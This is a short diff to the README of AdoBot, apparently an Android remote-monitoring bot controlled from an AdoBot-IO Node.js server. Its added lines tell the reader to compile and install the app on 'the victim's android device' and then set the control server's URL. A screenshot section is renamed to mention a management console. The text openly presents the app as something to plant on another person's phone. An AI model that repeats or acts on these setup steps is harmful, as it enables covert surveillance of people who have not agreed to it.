adonespitogo/AdoBot/README.md

 # Instructions

-Edit `app/src/main/java/com/android/adobot/CommonParams.java` and change the `PRODUCTION_SERVER` variable to the address of your [AdoBot-IO](https://github.com/adonespitogo/AdoBot-IO) server.
-Next, checkout [AdoBot-IO](https://github.com/adonespitogo/AdoBot-IO) on how to setup the NodeJS server.
+Just compile and install the app to the victim's android device.
+Then start the app and set the URL of your [AdoBot-IO](https://github.com/adonespitogo/AdoBot-IO) server.

-# Screen Shots
+# Management Console Screen Shots

 ## Main GUI